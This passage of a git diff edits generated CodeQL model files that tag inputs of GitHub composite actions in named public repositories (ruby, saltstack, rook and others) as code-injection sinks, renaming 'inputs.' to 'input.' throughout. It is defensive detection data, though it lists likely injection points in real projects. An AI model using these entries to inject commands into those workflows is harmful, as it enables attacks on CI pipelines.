"input.build_args", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.args", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.check-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 22c8a56deacb..19f9f7a03bb8 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["randombit/botan", "*", "inputs.target", "code-injection", "generated"] - - ["randombit/botan", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["randombit/botan", "*", "input.target", "code-injection", "generated"] + - ["randombit/botan", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 7476425a35f7..1ca71afacc7e 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["raspberrypi/documentation", "*", "inputs.secondary_host", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.destination", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.source", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.bastion_host", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.primary_host", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.public_bastion_host_keys", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.private_ssh_key", "code-injection", "generated"] \ No newline at end of file + - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.destination", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.source", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.bastion_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.primary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.public_bastion_host_keys", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.private_ssh_key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 3c96c1b159db..9f0ff2c86de4 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ray-project/kuberay", "*", "inputs.ray_version", "code-injection", "generated"] \ No newline at end of file + - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index da9def79964b..abb6c432aeff 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["readthedocs/actions", "*", "inputs.single-version", "code-injection", "generated"] - - ["readthedocs/actions", "*", "inputs.platform", "code-injection", "generated"] - - ["readthedocs/actions", "*", "inputs.message-template", "code-injection", "generated"] - - ["readthedocs/actions", "*", "inputs.project-language", "code-injection", "generated"] - - ["readthedocs/actions", "*", "inputs.project-slug", "code-injection", "generated"] \ No newline at end of file + - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.platform", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.message-template", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.project-language", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.project-slug", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 80c917396846..6548880f59ed 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["reflex-dev/reflex", "*", "inputs.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file + - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 2121bb23710b..5401d1760513 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["renovatebot/renovate", "*", "inputs.node-version", "code-injection", "generated"] \ No newline at end of file + - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index f0acc3056726..70cf81f1b787 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rethinkdb/rethinkdb", "*", "inputs.command", "code-injection", "generated"] - - ["rethinkdb/rethinkdb", "*", "inputs.install_command", "code-injection", "generated"] - - ["rethinkdb/rethinkdb", "*", "inputs.env_activate", "code-injection", "generated"] - - ["rethinkdb/rethinkdb", "*", "inputs.default_python_driver_commit_hash", "code-injection", "generated"] \ No newline at end of file + - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.install_command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.env_activate", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.default_python_driver_commit_hash", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index f099314b16e4..eccccba83feb 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["risc0/risc0", "*", "inputs.key", "code-injection", "generated"] - - ["risc0/risc0", "*", "inputs.components", "code-injection", "generated"] - - ["risc0/risc0", "*", "inputs.targets", "code-injection", "generated"] - - ["risc0/risc0", "*", "inputs.toolchain", "code-injection", "generated"] \ No newline at end of file + - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.components", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.targets", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.toolchain", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index 971cd92e3cd6..b7133aae3049 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rocketchat/rocket.chat", "*", "inputs.build-containers", "code-injection", "generated"] - - ["rocketchat/rocket.chat", "*", "inputs.release", "code-injection", "generated"] - - ["rocketchat/rocket.chat", "*", "inputs.docker-tag", "code-injection", "generated"] - - ["rocketchat/rocket.chat", "*", "inputs.root-dir", "code-injection", "generated"] \ No newline at end of file + - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.release", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.docker-tag", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.root-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 42aba6b02dd2..26d7b4482695 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rook/rook", "*", "inputs.use-tmate", "code-injection", "generated"] - - ["rook/rook", "*", "inputs.kubernetes-version", "code-injection", "generated"] - - ["rook/rook", "*", "inputs.additional-namespace", "code-injection", "generated"] - - ["rook/rook", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] + - ["rook/rook", "*", "input.kubernetes-version", "code-injection", "generated"] + - ["rook/rook", "*", "input.additional-namespace", "code-injection", "generated"] + - ["rook/rook", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 71d71f6cb21d..7600cd4bddeb 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["roots/trellis", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index 60a29d3edf7e..dd79b0845dd7 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ruby/debug", "*", "inputs.report-path", "code-injection", "generated"] \ No newline at end of file + - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 84d174e5a050..71bdd0014586 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ruby/ruby", "*", "inputs.builddir", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.srcdir", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.test-opts", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.report-path", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file + - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.srcdir", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.test-opts", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.report-path", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 5cc3a3a74750..3b3262f93a90 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_USER", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.sim_output", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.RUSEFI_SSH_PASS", "code-injection", "generated"] \ No newline at end of file + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_USER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.sim_output", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_SSH_PASS", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index cee842ae1c6f..b30d898dcc17 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["saltstack/salt", "*", "inputs.version", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.upload-chunk-size", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.restore-keys", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.save-always", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.lookup-only", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.fail-on-cache-miss", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.enableCrossOsArchive", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.key", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.upload-chunk-size", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.restore-keys", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.save-always", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.lookup-only", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.fail-on-cache-miss", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.enableCrossOsArchive", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.key", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 535e832c1c32..979a9aca5c25 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sap/sapmachine", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file + - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index e1902fb488fd..b180a319baaa 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scala-native/scala-native", "*", "inputs.llvm-version", "code-injection", "generated"] - - ["scala-native/scala-native", "*", "inputs.scala-version", "code-injection", "generated"] \ No newline at end of file + - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] + - ["scala-native/scala-native", "*", "input.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index 2ede3df98649..fb5fa4d8e4e6 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scitools/iris", "*", "inputs.version", "code-injection", "generated"] - - ["scitools/iris", "*", "inputs.install_packages", "code-injection", "generated"] - - ["scitools/iris", "*", "inputs.env_name", "code-injection", "generated"] \ No newline at end of file + - ["scitools/iris", "*", "input.version", "code-injection", "generated"] + - ["scitools/iris", "*", "input.install_packages", "code-injection", "generated"] + - ["scitools/iris", "*", "input.env_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index 1bea0aef9358..cb9faef2bf68 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scylladb/scylla-operator", "*", "inputs.containerImageName", "code-injection", "generated"] - - ["scylladb/scylla-operator", "*", "inputs.githubToken", "code-injection", "generated"] - - ["scylladb/scylla-operator", "*", "inputs.githubRef", "code-injection", "generated"] - - ["scylladb/scylla-operator", "*", "inputs.githubRepository", "code-injection", "generated"] \ No newline at end of file + - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubToken", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubRef", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubRepository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index 4a8bae9d2a1c..e7eb6b732ffb 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shader-slang/slang", "*", "inputs.platform", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.os", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.runs-on", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.config", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.compiler", "code-injection", "generated"] \ No newline at end of file + - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.os", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.runs-on", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.config", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index c63ed017ae17..a1b1a4b71e82 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shaka-project/shaka-player", "*", "inputs.state", "code-injection", "generated"] - - ["shaka-project/shaka-player", "*", "inputs.context", "code-injection", "generated"] - - ["shaka-project/shaka-player", "*", "inputs.job_name", "code-injection", "generated"] - - ["shaka-project/shaka-player", "*", "inputs.token", "code-injection", "generated"] \ No newline at end of file + - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.context", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.job_name", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index 544fc4b99516..2463b4a1d167 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.org", "code-injection", "generated"] - - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.app_name", "code-injection", "generated"] \ No newline at end of file + - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] + - ["shakacode/react-webpack-rails-tutorial", "*", "input.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 2d3871a2231e..87e88b2c13d5 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["simple-icons/simple-icons", "*", "inputs.issue_number", "code-injection", "generated"] \ No newline at end of file + - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index 4f18723df389..c0789d6e4241 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["slint-ui/slint", "*", "inputs.extra-packages", "code-injection", "generated"] - - ["slint-ui/slint", "*", "inputs.binary", "code-injection", "generated"] \ No newline at end of file + - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] + - ["slint-ui/slint", "*", "input.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index a96d86c7b5ca..f617b9d172d5 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["solidusio/solidus", "*", "inputs.last_minor", "code-injection", "generated"] - - ["solidusio/solidus", "*", "inputs.labels", "code-injection", "generated"] - - ["solidusio/solidus", "*", "inputs.base", "code-injection", "generated"] - - ["solidusio/solidus", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file + - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.labels", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.base", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index ff1b101be4ac..f30719d58d8f 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["solo-io/gloo", "*", "inputs.base-ref", "code-injection", "generated"] \ No newline at end of file + - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index fb7bdd0950ee..84d5c96e63b7 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sonarr/sonarr", "*", "inputs.filter", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.binary_path", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.artifact", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.version", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.major_version", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.branch", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.framework", "code-injection", "generated"] \ No newline at end of file + - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.binary_path", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.artifact", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.major_version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.branch", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.framework", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index 9b263d03357c..d76ab136ab9c 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sonic-pi-net/sonic-pi", "*", "inputs.command", "code-injection", "generated"] - - ["sonic-pi-net/sonic-pi", "*", "inputs.container-version", "code-injection", "generated"] - - ["sonic-pi-net/sonic-pi", "*", "inputs.container", "code-injection", "generated"] \ No newline at end of file + - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "input.container-version", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "input.container", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 5e6e66c4be4e..9e75660d1b3b 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spacedriveapp/spacedrive", "*", "inputs.setup-arg", "code-injection", "generated"] \ No newline at end of file + - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index cf545a955924..1cc6e837b840 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spockframework/spock", "*", "inputs.additional-java-version", "code-injection", "generated"] \ No newline at end of file + - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index 0484e9035153..b2e283c69830 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-io/initializr", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-io/initializr", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] + - ["spring-io/initializr", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index 756a1a0371ad..d08bdb5d6f44 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-io/start.spring.io", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-io/start.spring.io", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] + - ["spring-io/start.spring.io", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git 